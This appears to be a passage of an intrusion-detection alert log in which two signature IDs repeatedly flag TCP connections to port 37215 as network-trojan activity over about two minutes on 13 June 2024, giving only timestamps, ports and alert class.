              Timestamp:06/13/24-21:32:03.274983
              SID:2829579
              Source Port:42178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.836409
              SID:2829579
              Source Port:47144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.130359
              SID:2829579
              Source Port:56710
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.914560
              SID:2835222
              Source Port:50368
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.087602
              SID:2829579
              Source Port:40600
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.269130
              SID:2829579
              Source Port:58560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.275292
              SID:2829579
              Source Port:43184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.127147
              SID:2835222
              Source Port:52000
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.991501
              SID:2835222
              Source Port:53480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.409244
              SID:2829579
              Source Port:50682
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.214659
              SID:2835222
              Source Port:38852
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.756597
              SID:2829579
              Source Port:58634
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.937058
              SID:2829579
              Source Port:47052
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.010636
              SID:2835222
              Source Port:38926
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.196069
              SID:2829579
              Source Port:40116
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.992652
              SID:2835222
              Source Port:38576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.357429
              SID:2835222
              Source Port:55426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.403403
              SID:2829579
              Source Port:60212
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.749050
              SID:2835222
              Source Port:49882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.409430
              SID:2829579
              Source Port:58028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.608710
              SID:2829579
              Source Port:46380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.010933
              SID:2829579
              Source Port:47916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.306735
              SID:2829579
              Source Port:55646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.087560
              SID:2835222
              Source Port:52116
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.157044
              SID:2829579
              Source Port:33432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.729996
              SID:2829579
              Source Port:45854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.869864
              SID:2835222
              Source Port:58756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.678311
              SID:2829579
              Source Port:40840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.730803
              SID:2835222
              Source Port:37624
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.671582
              SID:2829579
              Source Port:60014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.756523
              SID:2835222
              Source Port:36162
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.135834
              SID:2835222
              Source Port:48138
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.299755
              SID:2835222
              Source Port:55216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.694046
              SID:2835222
              Source Port:33476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.436921
              SID:2829579
              Source Port:42948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.175109
              SID:2835222
              Source Port:58356
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.451987
              SID:2835222
              Source Port:55162
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.610825
              SID:2829579
              Source Port:53724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.128959
              SID:2835222
              Source Port:34830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.153061
              SID:2835222
              Source Port:38214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.508043
              SID:2829579
              Source Port:48182
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.954777
              SID:2829579
              Source Port:35414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.086360
              SID:2829579
              Source Port:48856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.406308
              SID:2829579
              Source Port:51154
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.151190
              SID:2835222
              Source Port:50348
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.213019
              SID:2829579
              Source Port:51142
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.694930
              SID:2829579
              Source Port:59038
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.028466
              SID:2835222
              Source Port:60660
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.819931
              SID:2835222
              Source Port:38100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.477125
              SID:2835222
              Source Port:43712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.221469
              SID:2829579
              Source Port:37994
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.307489
              SID:2835222
              Source Port:55782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.094733
              SID:2835222
              Source Port:45970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.889186
              SID:2835222
              Source Port:59296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.697705
              SID:2835222
              Source Port:50408
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.970547
              SID:2829579
              Source Port:33076
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.369998
              SID:2829579
              Source Port:53050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.308710
              SID:2835222
              Source Port:58534
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.671957
              SID:2835222
              Source Port:42376
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.870106
              SID:2835222
              Source Port:32888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.527889
              SID:2829579
              Source Port:43736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.077388
              SID:2835222
              Source Port:41168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.525840
              SID:2835222
              Source Port:36710
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.953726
              SID:2835222
              Source Port:45558
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.016053
              SID:2835222
              Source Port:42946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.820289
              SID:2829579
              Source Port:38450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.887731
              SID:2829579
              Source Port:53796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.452569
              SID:2835222
              Source Port:42250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.094218
              SID:2835222
              Source Port:53510
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.613981
              SID:2835222
              Source Port:60092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.252164
              SID:2829579
              Source Port:57412
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.274412
              SID:2835222
              Source Port:54888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.270612
              SID:2835222
              Source Port:50874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.799847
              SID:2829579
              Source Port:35440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.196885
              SID:2829579
              Source Port:60522
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.867082
              SID:2835222
              Source Port:60792
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.345883
              SID:2829579
              Source Port:59178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.073623
              SID:2835222
              Source Port:49094
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.375624
              SID:2835222
              Source Port:51864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.060224
              SID:2829579
              Source Port:35034
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.613523
              SID:2829579
              Source Port:39932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.134024
              SID:2829579
              Source Port:47922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.024474
              SID:2829579
              Source Port:54398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.727701
              SID:2835222
              Source Port:40288
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.305749
              SID:2829579
              Source Port:44594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.630434
              SID:2835222
              Source Port:56622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.868875
              SID:2829579
              Source Port:37466
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.617758
              SID:2835222
              Source Port:56122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.821146
              SID:2829579
              Source Port:49174
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.487139
              SID:2835222
              Source Port:42836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.106950
              SID:2835222
              Source Port:47694
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.991172
              SID:2835222
              Source Port:45102
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.376403
              SID:2829579
              Source Port:51150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.791547
              SID:2835222
              Source Port:40590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.128867
              SID:2835222
              Source Port:43382
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.409536
              SID:2829579
              Source Port:49828
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.455920
              SID:2829579
              Source Port:38642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.108096
              SID:2829579
              Source Port:55512
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.193305
              SID:2835222
              Source Port:57762
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.349373
              SID:2829579
              Source Port:35408
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.092508
              SID:2829579
              Source Port:52306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.752902
              SID:2829579
              Source Port:50444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.991397
              SID:2829579
              Source Port:50686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.973047
              SID:2829579
              Source Port:44886
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.167595
              SID:2835222
              Source Port:35344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.263073
              SID:2829579
              Source Port:50140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.840985
              SID:2829579
              Source Port:38044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.375312
              SID:2829579
              Source Port:50772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.633141
              SID:2835222
              Source Port:45766
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.509252
              SID:2829579
              Source Port:44574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.224061
              SID:2835222
              Source Port:38492
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.350192
              SID:2829579
              Source Port:49470
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.832636
              SID:2829579
              Source Port:36024
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.404821
              SID:2829579
              Source Port:57438
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.110446
              SID:2829579
              Source Port:56324
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.551260
              SID:2835222
              Source Port:50546
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.805388
              SID:2829579
              Source Port:60484
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.454260
              SID:2829579
              Source Port:43510
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.456603
              SID:2829579
              Source Port:39924
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.231781
              SID:2835222
              Source Port:45892
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.415678
              SID:2829579
              Source Port:44112
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.415442
              SID:2835222
              Source Port:46916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.823394
              SID:2835222
              Source Port:41230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.454905
              SID:2835222
              Source Port:52022
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.456872
              SID:2835222
              Source Port:35734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.371910
              SID:2829579
              Source Port:39036
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.549897
              SID:2829579
              Source Port:32916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.657522
              SID:2835222
              Source Port:50700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.316083
              SID:2829579
              Source Port:45474
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.087049
              SID:2829579
              Source Port:42320
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.212913
              SID:2829579
              Source Port:47550
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.169931
              SID:2829579
              Source Port:43796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.293769
              SID:2829579
              Source Port:56848
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.301397
              SID:2835222
              Source Port:47628
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.306996
              SID:2835222
              Source Port:57794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.176037
              SID:2835222
              Source Port:51014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.012355
              SID:2829579
              Source Port:60226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.457805
              SID:2829579
              Source Port:53968
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.786043
              SID:2835222
              Source Port:51318
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.307694
              SID:2829579
              Source Port:41374
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.632368
              SID:2835222
              Source Port:45918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.252928
              SID:2829579
              Source Port:33904
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.131031
              SID:2829579
              Source Port:48000
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.724818
              SID:2829579
              Source Port:35598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.213653
              SID:2829579
              Source Port:48706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.638708
              SID:2829579
              Source Port:55662
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.168230
              SID:2829579
              Source Port:50914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.108149
              SID:2829579
              Source Port:60140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.346323
              SID:2829579
              Source Port:57866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.200047
              SID:2829579
              Source Port:37562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.936360
              SID:2835222
              Source Port:38904
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.075503
              SID:2829579
              Source Port:49468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.418022
              SID:2835222
              Source Port:48256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.152831
              SID:2829579
              Source Port:34354
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.080080
              SID:2829579
              Source Port:39112
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.708645
              SID:2829579
              Source Port:35502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.502471
              SID:2829579
              Source Port:34816
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.757293
              SID:2835222
              Source Port:39754
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.945660
              SID:2835222
              Source Port:55362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.941951
              SID:2835222
              Source Port:47546
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.177214
              SID:2835222
              Source Port:57188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.672742
              SID:2829579
              Source Port:37162
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.566878
              SID:2829579
              Source Port:45320
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.566915
              SID:2835222
              Source Port:59548
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.758326
              SID:2835222
              Source Port:60558
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.379336
              SID:2835222
              Source Port:37648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.610874
              SID:2835222
              Source Port:37028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.258098
              SID:2829579
              Source Port:43060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.257930
              SID:2835222
              Source Port:45166
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.310241
              SID:2835222
              Source Port:51260
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.055955
              SID:2829579
              Source Port:57236
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.176868
              SID:2829579
              Source Port:60122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.242228
              SID:2829579
              Source Port:40586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.866574
              SID:2829579
              Source Port:34762
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.972454
              SID:2829579
              Source Port:34618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.913377
              SID:2829579
              Source Port:38194
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.094109
              SID:2829579
              Source Port:57382
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.306958
              SID:2835222
              Source Port:38780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.227828
              SID:2829579
              Source Port:43560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.177028
              SID:2835222
              Source Port:58156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.095814
              SID:2829579
              Source Port:54784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.408100
              SID:2829579
              Source Port:60130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.058557
              SID:2829579
              Source Port:39454
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.255554
              SID:2835222
              Source Port:51284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.752309
              SID:2835222
              Source Port:53444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.438567
              SID:2829579
              Source Port:34562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.043975
              SID:2835222
              Source Port:50466
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.886500
              SID:2835222
              Source Port:52618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.952189
              SID:2829579
              Source Port:50526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.129170
              SID:2835222
              Source Port:44818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.135920
              SID:2835222
              Source Port:50982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.322708
              SID:2835222
              Source Port:41918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.785764
              SID:2829579
              Source Port:49750
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.317842
              SID:2829579
              Source Port:43070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.211026
              SID:2835222
              Source Port:52336
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.097377
              SID:2829579
              Source Port:44470
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.571798
              SID:2835222
              Source Port:46656
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.309889
